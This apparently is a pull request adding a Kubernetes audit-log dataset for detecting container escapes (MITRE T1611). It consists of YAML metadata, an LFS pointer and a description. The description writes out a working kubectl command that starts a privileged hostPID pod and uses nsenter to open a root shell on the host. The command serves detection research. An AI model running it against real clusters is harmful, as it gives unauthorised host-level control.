### PR TITLE
T1611 - k8s audit logs - nsenter container escape

### DIFF
--- a/datasets/attack_techniques/T1611/k8s_audit.yml
+++ b/datasets/attack_techniques/T1611/k8s_audit.yml
@@ -1,5 +1,5 @@
 author: Travis Lowe
-id: 
+id: b40cf657-6d9b-43a3-9a3d-a7efd9aad6fd 
 date: '2023-01-28'
 description: 'Successful execution of a container escape command will allow an attacker to access host level resouces. In kubernetes this could lead to the entire cluster being compromised. This data set shows possible escapes.'
 environment: custom

--- a/datasets/attack_techniques/T1611/k8s_audit.yml
+++ b/datasets/attack_techniques/T1611/k8s_audit.yml
@@ -1,0 +1,14 @@
+author: Travis Lowe
+id: 
+date: '2023-01-28'
+description: 'Successful execution of a container escape command will allow an attacker to access host level resouces. In kubernetes this could lead to the entire cluster being compromised. This data set shows possible escapes.'
+environment: custom
+dataset:
+- https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/attack_techniques/T1611/nsenter.json
+sourcetypes:
+- kube:apiserver-audit
+references:
+- https://attack.mitre.org/techniques/T1611
+- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md
+- https://securekubernetes.com/scenario_2_attack/
+- https://twitter.com/mauilion/status/1129468485480751104

--- a/datasets/attack_techniques/T1611/nsenter.json
+++ b/datasets/attack_techniques/T1611/nsenter.json
@@ -1,0 +1,3 @@
+version https://git-lfs.github.com/spec/v1
+oid sha256:be0b54dca8175bc88ee34301638ebe465b27ca26dae45580318bf7b01fdb481b
+size 66540


### PR DESCRIPTION
This is a dataset that shows the complete lifecycle of a pod which is created using a known container escape. It tracks the initial request to create, the internal components of k8s provisioning it, and the eventual deletion of the pod.

These logs are the result of running the following command:
```
kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}'
```

This exact command is referenced in the atomic red team test, the securekubernetes reference and the tweet linked as references for this data.

